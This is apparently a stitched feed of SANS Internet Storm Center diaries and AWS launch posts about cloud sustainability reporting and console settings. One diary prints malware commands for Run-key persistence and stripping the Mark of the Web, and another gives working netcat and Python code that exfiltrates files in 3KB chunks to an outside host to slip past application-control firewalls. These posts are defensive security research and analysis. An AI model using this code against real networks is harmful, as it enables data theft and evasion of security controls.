TeamPCP Supply Chain Campaign: Update 005 – First Confirmed Victim Disclosure, Post-Compromise Cloud Enumeration Documented, and Axios Attribution Narrows, (Wed, Apr 1st)

This is the fifth update to the TeamPCP supply chain campaign threat intelligence report, "When the Security Scanner Became the Weapon" (v3.0, March 25, 2026). Update 004 covered developments through March 30, including the Databricks investigation, dual ransomware operations, and AstraZeneca data release. This update consolidates two days of intelligence through April 1, 2026.

Malicious Script That Gets Rid of ADS, (Wed, Apr 1st)

Today, a lot of malware is described as “fileless” because it tries to reduce its footprint on the infected computer's filesystem to the bare minimum. But malware still needs to write something somewhere (think about persistence), and the registry is a common alternative storage location.

But some scripts still rely on files that are executed automatically, for example via a “Run” key:

reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionRun" /v csgh4Pbzclmp /t REG_SZ /d ""%APPDATA%MicrosoftWindowsTemplatesdwm.cmd"" /f >nul 2>&1

The file located in %APPDATA% will be executed every time the user logs in.

From the attacker’s point of view, there is a problem: the copied file may keep the alternate data stream that marks it as downloaded from the Internet. The original script first copies itself:

copy /Y "%~f0" "%APPDATA%\Microsoft\Windows\Templates\dwm.cmd" >nul 2>&1

Just after the copy operation, a PowerShell one-liner is executed:

powershell -w h -c "try{Remove-Item -Path '%APPDATA%\Microsoft\Windows\Templates\dwm.cmd:Zone.Identifier' -Force -ErrorAction SilentlyContinue}catch{}" >nul 2>&1

PowerShell will try to remove the “:Zone.Identifier” alternate data stream (ADS) that Windows adds to files downloaded from the Internet (the “Mark of the Web”). The Zone.Identifier indicates the source of the file (0 = Local machine, 1 = Local intranet, 2 = Trusted sites, 3 = Internet, 4 = Restricted sites). It's not clear whether a "copy" will drop or preserve the ADS. I did not find official Microsoft documentation but, if you ask an LLM, it will tell you that the stream is not preserved. It is wrong!

In my Windows 10 lab, I downloaded a copy of BinaryNinja. A Zone.Identifier ADS was added to the downloaded file. After copying it to "test.ext", the new file still has the ADS!
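You can reproduce this check yourself. Here is a minimal Python sketch (Windows/NTFS only; the file names are hypothetical) that reads the Zone.Identifier stream before and after a copy performed with the cmd.exe "copy" command:

# Minimal sketch: check whether cmd.exe's "copy" preserves the
# Zone.Identifier ADS. Windows/NTFS only; file names are hypothetical.
import subprocess

def zone_identifier(path):
    """Return the content of the Zone.Identifier ADS, or None if absent."""
    try:
        # NTFS exposes alternate data streams via the "file:stream" syntax
        with open(f"{path}:Zone.Identifier") as stream:
            return stream.read()
    except OSError:
        return None

print("Original:", zone_identifier("downloaded.exe"))

# Use cmd.exe's built-in "copy" (the same operation the malicious script
# performs). Note: Python's shutil.copy() copies only the main data stream
# and would NOT preserve the ADS, so it cannot be used for this test.
subprocess.run("copy /Y downloaded.exe test.ext", shell=True, check=True)

print("Copy:    ", zone_identifier("test.ext"))  # the ADS is still present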

By removing the ADS, the malicious script makes the file look less suspicious if the system is scanned for "downloaded" files (a classic operation performed in DFIR investigations).

For the record, the script later invokes another PowerShell command that drops a DonutLoader on the victim's computer.

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Announcing the AWS Sustainability console: Programmatic access, configurable CSV reports, and Scope 1–3 reporting in one place

As many of you are, I’m a parent. And like you, I think about the world I’m building for my children. That’s part of why today’s launch matters for many of us. I’m excited to announce the launch of the AWS Sustainability console, a standalone service that consolidates all AWS sustainability reporting and resources in one place.

With The Climate Pledge, Amazon set a goal in 2019 to reach net-zero carbon across our operations by 2040. That commitment shapes how AWS builds its data centers and services. AWS is also committed to helping you measure and reduce the environmental footprint of your own workloads. The AWS Sustainability console is the latest step in that direction.

The AWS Sustainability console builds on the Customer Carbon Footprint Tool (CCFT), which lives inside the AWS Billing console, and introduces a new set of capabilities you’ve been asking for.

Until now, accessing your carbon footprint data required billing-level permissions. That created a practical problem: sustainability professionals and reporting teams often don’t have (and shouldn’t need) access to cost and billing data. Getting the right people access to the right data meant navigating permission structures that weren’t designed with sustainability workflows in mind. The AWS Sustainability console has its own permissions model, independent of the Billing console. Sustainability professionals can now get direct access to emissions data without requiring billing permissions to be granted alongside it.
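For illustration, a minimal identity-based policy for a sustainability analyst could look like the following sketch. The action name is an assumption based on the usual service:Operation naming convention and the CLI operation shown later in this post; check the service authorization reference for the exact actions:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": "sustainability:GetEstimatedCarbonEmissions",
            "Resource": "*"
        }
    ]
}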

The console includes Scope 1, 2, and 3 emissions attributed to your AWS usage and shows you a breakdown by AWS Region and by service, such as Amazon CloudFront, Amazon Elastic Compute Cloud (Amazon EC2), and Amazon Simple Storage Service (Amazon S3). The underlying data and methodology haven’t changed with this launch; they are the same as those used by the CCFT. What has changed is how you can access and work with the data.

As sustainability reporting requirements have grown more complex, teams need more flexibility in accessing and working with their emissions data. The console now includes a Reports page where you can download preset monthly and annual carbon emissions reports covering both market-based method (MBM) and location-based method (LBM) data. You can also build a custom comma-separated values (CSV) report by selecting which fields to include, the time granularity, and other filters.

If your organization’s fiscal year doesn’t align with the calendar year, you can now configure the console to match your reporting period. When that is set, all data views and exports reflect your fiscal year and quarters, which removes a common friction point for finance and sustainability teams working in parallel.

You can also use the new API or the AWS SDKs to integrate emissions data into your own reporting pipelines, dashboards, or compliance workflows. This is useful for teams that need to pull data for a specific month across a large number of accounts without setting up a data export or for organizations that need to establish custom account groupings that don’t align with their existing AWS Organizations structure.
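If you work in Python, such an integration could look like the following sketch with the AWS SDK for Python (boto3). The client and operation names here are assumptions inferred from the CLI call shown later in this post, and the response parsing mirrors the JSON output of that call; check the SDK documentation for the exact names:

# Sketch only: the service name ("sustainability") and operation/parameter
# names are inferred from the "aws sustainability get-estimated-carbon-emissions"
# CLI call below and may differ in the released SDK.
import boto3

client = boto3.client("sustainability")

response = client.get_estimated_carbon_emissions(
    TimePeriod={"Start": "2025-03-01T00:00:00Z", "End": "2026-03-01T23:59:59.999Z"}
)

# The structure below mirrors the JSON output of the CLI example.
for result in response["Results"]:
    start = result["TimePeriod"]["Start"]
    values = result["EmissionsValues"]
    print(start,
          "LBM:", values["TOTAL_LBM_CARBON_EMISSIONS"]["Value"],
          "MBM:", values["TOTAL_MBM_CARBON_EMISSIONS"]["Value"],
          "MTCO2e")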

You can read about the latest feature releases and methodology updates on the Release notes page, under the Learn more tab.

Let’s see it in action
To show you the Sustainability console, I opened the AWS Management Console and searched for “sustainability” in the search bar at the top of the screen.


The Carbon emissions section gives an estimate of your carbon emissions, expressed in metric tons of carbon dioxide equivalent (MTCO2e). It shows the emissions by scope, expressed in both the MBM and the LBM. On the right side of the screen, you can adjust the date range or filter by service, Region, and more.

For those unfamiliar: Scope 1 includes direct emissions from owned or controlled sources (for example, data center fuel use); Scope 2 covers indirect emissions from the production of purchased energy (with MBM accounting for energy attribute certificates and LBM using average local grid emissions); and Scope 3 includes other indirect emissions across the value chain, such as server manufacturing and data center construction. You can read more about this in our methodology document, which was independently verified by Apex, a third-party consultant.

I can also use the API or the AWS Command Line Interface (AWS CLI) to pull the emissions data programmatically.

aws sustainability get-estimated-carbon-emissions \
     --time-period='{"Start":"2025-03-01T00:00:00Z","End":"2026-03-01T23:59:59.999Z"}'

{
    "Results": [
        {
            "TimePeriod": {
                "Start": "2025-03-01T00:00:00+00:00",
                "End": "2025-04-01T00:00:00+00:00"
            },
            "DimensionsValues": {},
            "ModelVersion": "v3.0.0",
            "EmissionsValues": {
                "TOTAL_LBM_CARBON_EMISSIONS": {
                    "Value": 0.7,
                    "Unit": "MTCO2e"
                },
                "TOTAL_MBM_CARBON_EMISSIONS": {
                    "Value": 0.1,
                    "Unit": "MTCO2e"
                }
            }
        },
...

The combination of the visual console and the new API gives you two additional ways to work with your data, alongside the Data Exports capability that remains available. You can now explore and identify hotspots in the console and automate the reporting you want to share with stakeholders.

The Sustainability console is designed to grow. We plan to keep releasing new features as we expand the console’s capabilities alongside our customers.

Get started today
The AWS Sustainability console is available today at no additional cost. You can access it from the AWS Management Console. Historical data is available going back to January 2022, so you can start exploring your emissions trends right away.

Get started on the console today. If you want to learn more about the AWS commitment to sustainability, visit the AWS Sustainability page.

— seb

Application Control Bypass for Data Exfiltration, (Tue, Mar 31st)

In case of a cyber incident, most organizations fear data loss (via exfiltration) more than data encryption because they have a good backup policy in place. If exfiltration happens, it means a total loss of control over the stolen data, with all the consequences that implies (PII, credit card numbers, …).

While performing a security assessment of a corporate network, I discovered a TCP port open to the wild Internet, even though the audited company had a pretty strong firewall policy. The open port was discovered via a regular port scan. In such a situation, you try to exploit this "hole" in the firewall, so I tried to exfiltrate data through it. It’s easy: simulate a server controlled by a threat actor:

root@attacker:~# nc -l -p 12345 >/tmp/victim.tgz

And, from a server on the victim’s network:

root@victim:~# tar czvf - /juicy/data/to/exfiltrate | nc wild.server.com 12345

It worked, but the data transfer failed after ~5KB of data sent… weird! The same thing happened every time. I talked to a local network administrator, who told me that they have a Palo Alto Networks firewall in place with App-ID enabled on this port.

Note: What I am explaining here is not specific to this brand of firewall. The same behavior may apply to any “next-generation” firewall! For example, Check Point firewalls use the App Control blade and Fortinet firewalls use “Application Control”.

App-ID in Palo Alto Networks firewalls is the component performing traffic classification on the protected network(s), regardless of port, protocol, or encryption. Instead of relying on traditional port-based rules (e.g., TCP/80 == HTTP), App-ID analyzes traffic in real time to determine the actual application (e.g., Facebook, Dropbox, custom apps), enabling more granular and accurate security policies. This allows administrators to permit, deny, or control applications directly, apply user-based rules, and enforce security profiles (IPS, URL filtering, etc.) based on the true nature of the traffic rather than superficial indicators like ports. It also prevents well-known protocols from being used on exotic ports (e.g., SSH over TCP/12222).

The main issue with this technique is that enough packets must be seen on the wire before a reliable classification can be made. So, the traffic is always allowed at first and, if something bad is detected, the remaining packets are blocked.

In terms of data volume, there’s no strict fixed threshold, but in practice App-ID usually needs at least the first few KB of application payload to reach a reliable classification. Roughly speaking:

  • <1 KB (or just handshake packets): almost always insufficient → likely unknown or very generic classification
  • ~1–5 KB: basic identification possible for simple or clear-text protocols (HTTP, DNS, some TLS SNI-based detection)
  • ~5–10+ KB: much higher confidence, especially for encrypted or complex applications

That’s why my attempts to exfiltrate data were all blocked after ~5KB.
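Out of curiosity, you can estimate this cutoff empirically. Below is a rough Python sketch; the host name is a placeholder for a machine running a netcat listener like the one above, and the reported figure includes data still queued in the local send buffer, so it overestimates what actually crossed the firewall:

# Rough probe: keep sending 1KB blocks until the firewall silently starts
# dropping packets. Once packets are dropped, ACKs stop coming back, the
# local send buffer fills up, and sendall() eventually times out.
import socket

HOST, PORT = "wild.server.com", 12345   # placeholder listener

sent = 0
try:
    with socket.create_connection((HOST, PORT), timeout=5) as s:
        while True:
            s.sendall(b"A" * 1024)      # 1KB at a time
            sent += 1024
except OSError:                         # socket.timeout is a subclass of OSError
    pass

print(f"Connection stalled after queuing ~{sent} bytes")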

Can we bypass this? Let’s try the following scenario:

On the external host (managed by me, the "Threat Actor"), let’s run netcat in an infinite loop with a small timeout (because the firewall won’t drop the connection, it just blocks packets):

# Receive one chunk per TCP connection; -w 5 makes nc exit after 5 seconds
# of inactivity so the loop can restart and wait for the next chunk.
i=0
while true; do
    filename=$(printf "/tmp/chunk_%04d.bin" "$i")
    nc -l -p 12345 -v -v -w 5 >"$filename"
    echo "Dumped $filename"
    ((i++))
done

On the victim’s computer, I (vibe-)coded a Python script that performs the following tasks:
– Read a file
– Split it into chunks of 3KB
– Send each chunk over a TCP connection (with retries in case of failure, of course)
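To make the approach concrete, here is a simplified sketch of that logic. It is not the actual script (which adds retries and nicer progress output), just a minimal illustration of the one-connection-per-chunk idea:

#!/usr/bin/env python3
# Simplified sketch of the chunked exfiltration logic described above.
# Each 3KB chunk is sent over its OWN TCP connection, so no single
# connection ever gives the firewall enough payload to classify it.
import socket
import sys
import time

CHUNK_SIZE = 3072  # 3KB, safely below the ~5KB classification threshold

def send_file(path, host, port):
    with open(path, "rb") as f:
        index = 0
        while chunk := f.read(CHUNK_SIZE):
            index += 1
            with socket.create_connection((host, port), timeout=5) as s:
                s.sendall(chunk)
            print(f"Chunk {index} sent ({len(chunk)} bytes)")
            # Small pause so the listener loop has time to restart netcat;
            # the real script retries failed chunks instead of sleeping.
            time.sleep(0.5)

if __name__ == "__main__":
    send_file(sys.argv[1], sys.argv[2], int(sys.argv[3]))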

The full script is available on Pastebin[1]. Here is an example run:

root@victim:~# sha256sum data.zip
955587e24628dc46c85a7635cae888832113e86e6870cba0312591c44acf9833  data.zip
root@victim:~# python3 send_file.py data.zip wild.server.com 12345
File: 'data.zip' (359370 bytes) -> 1177 chunk(s) of up to 3072 bytes.
Destination: wild.server.com:12345  (timeout=5s, max_retries=10)

  Chunk 1/1177 sent successfully (attempt 1).
  Chunk 2/1177 sent successfully (attempt 1).
  Chunk 3/1177 sent successfully (attempt 1).
  Chunk 4/1177 sent successfully (attempt 1).
  Chunk 5/1177 sent successfully (attempt 1).
  Chunk 6/1177 sent successfully (attempt 1).
  Chunk 7/1177 sent successfully (attempt 1).
  Chunk 8/1177 sent successfully (attempt 1).
  Chunk 9/1177 sent successfully (attempt 1).
  Chunk 10/1177 sent successfully (attempt 1).
  Chunk 11/1177 sent successfully (attempt 1).
  Chunk 12/1177 sent successfully (attempt 1).
  [...]

And on the remote side, the chunks are created; you just need to rebuild the original file:

root@attacker:~# cat /tmp/chunk_*.bin >victim.zip
root@attacker:~# sha256sum victim.zip
955587e24628dc46c85a7635cae888832113e86e6870cba0312591c44acf9833  victim.zip

The file has been successfully exfiltrated (the SHA256 hashes are identical)! Of course, it's slow, but it does not generate bandwidth peaks that could reveal a huge amount of data being exfiltrated!

This technique worked for me with a file of a few megabytes. It is more of a proof-of-concept, because firewalls may implement additional detection controls. For example, this technique is easy to detect due to the high number of small TCP connections, which may look like malware beaconing. It could also be useful to encrypt your data, because the packets could otherwise be flagged by the IDS component of the firewall…
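If you want to experiment with that last idea, each chunk could be encrypted with a pre-shared key before being sent. A minimal sketch using the third-party cryptography package (the receiving side would decrypt each chunk file with the same key before reassembly):

# pip install cryptography
from cryptography.fernet import Fernet

key = Fernet.generate_key()        # generate once, share with the receiver
cipher = Fernet(key)

chunk = b"...up to 3KB of file data..."
encrypted = cipher.encrypt(chunk)  # base64 token, slightly larger than the input
# Send "encrypted" instead of the clear-text chunk; the receiver calls
# cipher.decrypt() on each chunk file before concatenating them.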

[1] https://pastebin.com/Ct9ePEiN

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

TeamPCP Supply Chain Campaign: Update 004 – Databricks Investigating Alleged Compromise, TeamPCP Runs Dual Ransomware Operations, and AstraZeneca Data Released, (Mon, Mar 30th)

This is the fourth update to the TeamPCP supply chain campaign threat intelligence report, "When the Security Scanner Became the Weapon" (v3.0, March 25, 2026). Update 003 covered developments through March 28, including the first 48-hour pause in new compromises and the campaign's shift to monetization. This update consolidates intelligence from March 28-30, 2026 — two days since our last update.

DShield (Cowrie) Honeypot Stats and When Sessions Disconnect, (Mon, Mar 30th)

A lot of the information seen on DShield honeypots [1] is repeated bot traffic, especially when looking at the Cowrie [2] telnet and SSH sessions. However, how long a session lasts, how many commands are run per session, and which commands are run last before a session disconnects can vary. Some of this information can help indicate whether a session is automated and whether a honeypot was fingerprinted. It can also be used to find more interesting honeypot sessions.

TeamPCP Supply Chain Campaign: Update 003 – Operational Tempo Shift as Campaign Enters Monetization Phase With No New Compromises in 48 Hours, (Sat, Mar 28th)

This is the third update to the TeamPCP supply chain campaign threat intelligence report, "When the Security Scanner Became the Weapon" (v3.0, March 25, 2026). Update 002 covered developments through March 27, including the Telnyx PyPI compromise and Vect ransomware partnership. This update covers developments from March 27-28, 2026.

TeamPCP Supply Chain Campaign: Update 002 – Telnyx PyPI Compromise, Vect Ransomware Mass Affiliate Program, and First Named Victim Claim, (Fri, Mar 27th)

This is the second update to the TeamPCP supply chain campaign threat intelligence report, "When the Security Scanner Became the Weapon" (v3.0, March 25, 2026). Update 001 covered developments through March 26. This update covers developments from March 26-27, 2026.

Customize your AWS Management Console experience with visual settings including account color, region and service visibility

In August 2025, we introduced the AWS User Experience Customization (UXC) capability to tailor user interfaces (UIs) to meet your specific needs and help you complete your tasks efficiently. With this capability, your account administrator can customize some UI components of the AWS Management Console, such as assigning a color to an AWS account for easier identification.

Today, we’re announcing additional customization capabilities in UXC that enable selective display of relevant AWS Regions and services for your team members. By hiding unused Regions and services, you can reduce cognitive load and eliminate unnecessary clicks and scrolling, helping you focus better and work faster. With this launch, we offer the ability to customize account color, Region visibility, and service visibility together.

Categorize accounts by color
You can set a color for your accounts to visually distinguish between them. To get started, sign in to the AWS Management Console and choose your account name on the navigation bar. If your account color isn’t set yet, choose Account to set it.

In the Account display settings, select your preferred account color and choose Update. You can see the chosen color in the navigation bar.

By changing the account color, you can clearly distinguish the account’s purpose. For example, you can use orange for development accounts, light blue for test accounts, and red for production accounts.

Customize Regions and services visibility
You can control which AWS Regions appear in the Region selector and which AWS services appear in the console navigation. In other words, you can choose to show only the Regions and services that are relevant to your account.

To get started, choose the gear icon on the navigation bar and choose See all user settings. If you are in an administrator role, you will see a new Account settings tab in the unified settings. If you have not configured a setting, all Regions and services are visible.

To set visible Regions, choose Edit in the Visible Regions section. Set your visible Regions to either All available Regions or Select Regions and configure your list. Choose Save changes.

After configuring the visible Regions setting, you will find only the selected Regions in the Region selector on the navigation bar in the console.

You can also set visible services in the same way. Search for services or select them from the categories. I used the Popular services category to select my favorites. When you finish your selection, choose Save changes.

After configuring the visible services setting, you will find only the selected services in the All services menu on the navigation bar.

When you search for a service name in the search bar, you can only choose from the selected services.

The Regions and services visibility settings control only the appearance of services and Regions in the console. They don’t restrict access through the AWS Command Line Interface (AWS CLI), AWS SDKs, AWS APIs, or Amazon Q Developer.

You can also manage these account customization settings programmatically with the new visibleServices and visibleRegions parameters. For example, you can use this sample AWS CloudFormation template:

AWSTemplateFormatVersion: "2010-09-09"
Description: Customize AWS Console appearance for this account

Resources:
  AccountCustomization:
    Type: AWS::UXC::AccountCustomization
    Properties:
      AccountColor: red
      VisibleServices:
        - s3
        - ec2
        - lambda
      VisibleRegions:
        - us-east-1
        - us-west-2

And you can deploy your CloudFormation template:

$ aws cloudformation deploy \
  --template-file account-customization.yaml \
  --stack-name my-account-customization

To learn more, visit the AWS User Experience Customization API Reference and AWS CloudFormation template reference.

Give it a try in the AWS Management Console today and provide feedback by selecting the Feedback link at the bottom of the console, posting to the AWS re:Post forum for the AWS Management Console, or reaching out to your AWS Support contacts.

Channy

TeamPCP Supply Chain Campaign: Update 001 – Checkmarx Scope Wider Than Reported, CISA KEV Entry, and Detection Tools Available, (Thu, Mar 26th)

This is the first update to the TeamPCP supply chain campaign threat intelligence report, “When the Security Scanner Became the Weapon” (v3.0, March 25, 2026). That report covers the full campaign from the February 28 initial access through the March 24 LiteLLM PyPI compromise. This update covers developments since publication.